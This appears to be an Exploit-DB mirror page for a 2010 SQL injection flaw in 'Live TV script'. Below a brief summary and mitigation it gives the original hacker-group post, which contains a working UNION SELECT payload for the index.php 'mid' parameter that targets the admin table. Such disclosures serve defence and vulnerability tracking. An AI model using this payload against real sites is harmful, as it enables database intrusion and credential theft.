header-logo
Suggest Exploit
vendor:
Live TV script
by:
R3d-D3v!L
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Live TV script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Live TV script suffer from remote sql injection

Live TV script is vulnerable to a remote SQL injection attack. An attacker can exploit this vulnerability by sending a malicious SQL query to the server via the 'mid' parameter in the 'index.php' file. This query can be used to extract sensitive information from the database, such as usernames and passwords.

Mitigation:

Input validation should be used to prevent malicious SQL queries from being sent to the server.
Source

Exploit-DB raw data:

[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~] Tybe: Live TV script suffer from remote sql injection
[~] Vendor: livetvscript.com
[?] Software: Live TV script
[-]
[?] author: ((R3d-D3v!L))
[?] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY
[?] contact: N/A
[-]
[?] Date: 3.Jan.2010
[?] T!ME: 03:55 am GMT
[?] Home: WwW.xP10.ME
[?]
[?]
[-]??????????????????????{DEV!L'5 of SYST3M}??????????????????


[*] Err0r C0N50L3:


http://server/p47h/index.php?mid={EV!L EXPLO!T}

[~] {EV!L EXPLO!T}:

-666+union+all+select+1,@@version,3,4+from+admin--



N073:

REAL RED DEV!L W@S h3r3 LAMERZ

GAZA !N our hearts !




[~]-----------------------------{((Angela Bennett))}---------------------------------------


[~] Greetz tO: dolly & L!TTLE 547r & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush_1987

[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ

[~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4

[?]spechial SupP0RT: MY M!ND ;) & ((OFFsec))

[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L))--M2Z--JUPA-aNd-Devil ro0t : Goo Goo Cs Tiroo

[~]spechial FR!ND: 74M3M

[~] !'M 4R48!4N 3XPL0!73R.

[~]{[(D!R 4ll 0R D!E)]};

[~]--------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR